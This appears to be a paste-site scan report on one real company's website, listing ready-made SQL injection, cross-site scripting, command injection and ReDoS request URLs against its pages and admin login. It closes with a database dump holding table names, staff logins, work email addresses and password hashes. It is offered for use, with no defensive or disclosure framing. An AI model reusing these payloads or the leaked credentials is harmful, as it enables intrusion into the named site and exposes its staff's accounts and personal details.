Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- WWW.ATAS.CZ SCAN REPORT - NETSPARKER, WEBCRUISER, ACUNETIX, W3AF, HAVIJ
- |||--- :(Vulnerability Chart - Graf. http://img24.eu/v.php?file=lmusn6r9.jpg):--- |||
- ||| ---:(Acunetix Screen - http://img24.eu/v.php?file=o78ltker.jpg):---) |||
- Basic Information - Server Apache/2.2.17 (Unix) mod_ddmh/0.0.16
- |||
- http://www.atas.cz/page.php?sekce=1&menuid=-4 union select 1,2,3, user (),5,6,7
- http://www.atas.cz/page.php?sekce=1&menuid=-4 union select 1,2,3, database (),5,6,7
- |||
- SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.atas.cz/page.php?sekce=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=cz
- http://www.atas.cz/page.php?sekce=1&menuid=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=en
- http://www.atas.cz/products.php?sekce=2&menuid=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=en
- http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid=13&detail=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- [High Possibility] SQL Injection
- http://www.atas.cz/page.php?sekce=%27&lng=cz
- http://www.atas.cz/page.php?sekce=1&menuid=%27&lng=en
- http://www.atas.cz/products.php?sekce=2&menuid=%27&lng=en
- http://www.atas.cz/link.php?sekce=1&menuid=%27&lng=cz
- http://www.atas.cz/link.php?sekce=1&menuid=NSFTW&lng=cz
- http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid=13&detail=%27
- Severity : Critical
- Confirmation : Confirmed
- http://www.atas.cz/admin/login.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- |||
- XSS
- http://www.atas.cz/page.php?sekce='"--></style></script><script>alert(0x000042)</script>&lng=cz
- http://www.atas.cz/news.php?lng=en&sekce='"--></style></script><script>alert(0x000077)</script>&menuid=4
- http://www.atas.cz/page.php?sekce='"--></style></script><script>alert(0x00007B)</script>&menuid=49&lng=en
- http://www.atas.cz/news.php?lng=en&sekce=1&menuid='"--></style></script><script>alert(0x00007C)</script>
- http://www.atas.cz/page.php?sekce=1&menuid='"--></style></script><script>alert(0x000082)</script>&lng=en
- http://www.atas.cz/article.php?lng=en&sekce='"--></style></script><script>alert(0x0000AF)</script>&menuid=4&article=142
- http://www.atas.cz/article.php?lng=en&sekce=1&menuid='"--></style></script><script>alert(0x0000B7)</script>&article=142
- http://www.atas.cz/products.php?sekce='"--></style></script><script>alert(0x000210)</script>&menuid=13&lng=en
- http://www.atas.cz/products.php?sekce=2&menuid='"--></style></script><script>alert(0x00021A)</script>&lng=en
- http://www.atas.cz/job.php?sekce='"--></style></script><script>alert(0x000254)</script>&menuid=7&lng=cz
- http://www.atas.cz/job.php?sekce=1&menuid='"--></style></script><script>alert(0x00025B)</script>&lng=cz
- http://www.atas.cz/product-detail.php?lng=en&sekce='"--></style></script><script>alert(0x0003B9)</script>&menuid=13&detail=12
- http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid='"--></style></script><script>alert(0x0003C0)</script>&detail=12
- http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=" onmouseover=prompt(999125) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=141&lng=cz&menuid=" onmouseover=prompt(922971) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=139&lng=cz&menuid=" onmouseover=prompt(957364) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=138&lng=cz&menuid=" onmouseover=prompt(907063) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=136&lng=cz&menuid=" onmouseover=prompt(914207) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=142&lng=en&menuid=" onmouseover=prompt(934330) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=142&lng=ru&menuid=" onmouseover=prompt(910350) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=142&lng=de&menuid=" onmouseover=prompt(909474) bad="&sekce=1
- http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=" onmouseover=prompt(948663) bad="&sekce=
- http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=4&sekce=" onmouseover=prompt(909068) bad="
- http://www.atas.cz:80/article.php?article=141&lng=cz&menuid=4&sekce=" onmouseover=prompt(997244) bad="
- http://www.atas.cz:80/article.php?article=139&lng=cz&menuid=4&sekce=" onmouseover=prompt(980711) bad="
- http://www.atas.cz:80/article.php?article=138&lng=cz&menuid=4&sekce=" onmouseover=prompt(996406) bad="
- http://www.atas.cz:80/article.php?article=136&lng=cz&menuid=4&sekce=" onmouseover=prompt(985287) bad="
- http://www.atas.cz:80/article.php?article=142&lng=en&menuid=4&sekce=" onmouseover=prompt(955529) bad="
- http://www.atas.cz:80/article.php?article=142&lng=ru&menuid=4&sekce=" onmouseover=prompt(956753) bad="
- http://www.atas.cz:80/article.php?article=142&lng=de&menuid=4&sekce=" onmouseover=prompt(951644) bad="
- http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=16&sekce=" onmouseover=prompt(954781) bad="
- http://www.atas.cz:80/news.php?lng=cz&menuid=" onmouseover=prompt(943739) bad="&sekce=1
- http://www.atas.cz:80/news.php?lng=en&menuid=" onmouseover=prompt(955579) bad="&sekce=1
- http://www.atas.cz:80/news.php?lng=ru&menuid=" onmouseover=prompt(979814) bad="&sekce=1
- http://www.atas.cz:80/news.php?lng=de&menuid=" onmouseover=prompt(901148) bad="&sekce=1
- http://www.atas.cz:80/news.php?lng=cz&menuid=" onmouseover=prompt(951045) bad="&sekce=
- http://www.atas.cz:80/news.php?lng=cz&menuid=4&sekce=" onmouseover=prompt(979266) bad="
- http://www.atas.cz:80/news.php?lng=en&menuid=4&sekce=" onmouseover=prompt(962782) bad="
- http://www.atas.cz:80/news.php?lng=ru&menuid=4&sekce=" onmouseover=prompt(901391) bad="
- http://www.atas.cz:80/news.php?lng=de&menuid=4&sekce=" onmouseover=prompt(931607) bad="
- http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(994515) bad="
- http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(915970) bad="
- http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(935046) bad="
- http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(944431) bad="
- Vulnerable URL : http://www.atas.cz/admin/login.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003CC)</script>
- |||
- Cookie Sql Injection
- ReferURL http://www.atas.cz/article.php?lng=cz&sekce=1&menuid=4^article=141
- Parameter article=141
- Type Integer
- KWordActionURL Aktuality
- ReferURL http://www.atas.cz/link.php?lng=cz&sekce=1^menuid=53
- Parameter menuid=53
- Type Integer
- KWordActionURL chataatas
- |||
- URL SQL INJECTION
- ReferURL http://www.atas.cz/article.php?menuid=4&article=141&lng=en&sekce=1
- Parameter sekce=1
- Type String
- KWordActionURL elektromotory
- ReferURL http://www.atas.cz/article.php?menuid=4&article=141&lng=en&sekce=99999999
- Parameter sekce=99999999
- Type Integer
- KWordActionURL elektromotory
- ReferURL http://www.atas.cz/index.php?lng=cz&sekce=1&menuid=16
- Parameter menuid=16
- Type Integer
- KWordActionURL Udrzba
- ReferURL http://www.atas.cz/page.php?sekce=1&menuid=1&lng=cz
- Parameter lng=cz
- Type String
- KWordActionURL elektromotory
- ReferURL http://www.atas.cz/page.php?lng=cz&sekce=1&menuid=1
- Parameter menuid=1
- Type String
- KWordActionURL error
- ReferURL http://www.atas.cz/news.php?sekce=1&menuid=4&lng=99999999
- Parameter lng=99999999
- Type String
- KWordActionURL elektromotory
- http://www.atas.cz/job.php?sekce=1&menuid=7&lng=cz
- Parameter lng=cz
- Type String
- KWordActionURL Kariéra
- |||
- ReDoS Vulnerability
- http://www.atas.cz/results.php?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=11111111111111111111111111111111199%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=11111111111111111111111111111111199%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=11111111111111111111111111111111199%21&sa=Hledat&cof=FORID%3A10
- |||
- Possible ReDoS Vulnerability
- http://www.atas.cz/results.php?q=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=11111111111111111111111111111111199%21
- |||
- OS Commanding Vulnerability
- http://www.atas.cz/results.php?q=%7Cping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%60ping%20-c%209%20localhost%60&sa=Hledat&cof=FORID%3A10
- |||
- Possible OS Commanding Vulnerability
- http://www.atas.cz/results.php?q=ping%20-n%203%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=ping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=%26%26ping%20-n%203%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=%26%26ping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=%26%26%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=ping%20-n%203%20localhost&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=%3Bping%20-n%203%20localhost&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=ping%20-n%203%20localhost&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%7Cping%20-c%209%20localhost&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3Bping%20-n%203%20localhost&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3Bping%20-c%209%20localhost&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3B%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%60ping%20-n%203%20localhost%60&sa=Hledat&cof=FORID%3A10
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=ping%20-n%203%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=ping%20-c%209%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%26%26ping%20-n%203%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%26%26ping%20-c%209%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%7Cping%20-n%203%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%7C%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3Bping%20-n%203%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3Bping%20-c%209%20localhost
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3B%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%60ping%20-n%203%20localhost%60
- http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=run%20ping%20-n%203%20localhost
- |||
- PHPinfo page found
- This vulnerability affects /phpinfo.php
- http://www.atas.cz/phpinfo.php
- |||
- Possible sensitive files
- This vulnerability affects /.htaccess
- http://www.atas.cz/.htaccess
- |||--- :(Report by Havij):--- |||
- Host IP: 127.0.0.1 (Proxy IP)
- Web Server: Apache/2.2.17 (Unix) mod_ddmh/0.0.16
- DB Server: MySQL
- Resp. Time(avg):6098 ms
- Sql Version: 5.0.44-log
- Current DB: atas
- System User: atas@10.1.1.17
- Host Name: sql3
- Installation dir: /usr/
- Keyword Found: mysqli::query()
- Injection type is Integer
- Selected Column Count is 2
- Valid String Column is 1
- Current DB: atas
- |
- Table Name Columns
- a4_cisparam id seq type nazev_cz nazev_en nazev_de nazev_ru
- a4_item_properties id post_id cisparam_id value_cz value_en value_de value_ru
- a4_kariera id zobrazit seq nazev misto popis TypPrVztahu nastup autor vytvoreno zmenil zmeneno
- a4_menutree id parent_id nazev_cz seq nazev_en nazev_de nazev_ru url only_cz
- a4_posts id menu_id post_id post_date post_type post_title_cz post_text_cz post_title_en post_text_en post_title_de post_text_de post_title_ru post_text_ru post_status date_create date_modify post_end author_id modifier_id seo_url_cz seo_url_en seo_url_de seo_url_ru meta_keywords_cz meta_keywords_en meta_keywords_de meta_keywords_ru meta_desc_cz meta_desc_en meta_desc_de meta_desc_ru
- a4_users id login passwd name email usertype
- |
- Count(*) of atas.a4_users is 4
- Columns found: login,passwd,email
- Data Found: login=admin
- Data Found: passwd=ac754a330530832ba1bf7687f577da91
- Data Found: email=ambroz@atas.cz
- Data Found: login=salova
- Data Found: passwd=bfb4f2296180e4cb2d7a9ecce664be0b
- Data Found: email=salova@atas.cz
- Data Found: login=ambroz
- Data Found: passwd=ac754a330530832ba1bf7687f577da91
- Data Found: email=ambroz@atas.cz
- Data Found: login=boruvkova
- Data Found: passwd=07a792c523bc5e1295f473eb75d7b745
- Data Found: email=boruvkova@atas.cz
- Statistika
- http://navrcholu.cz/Statistika/16643
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement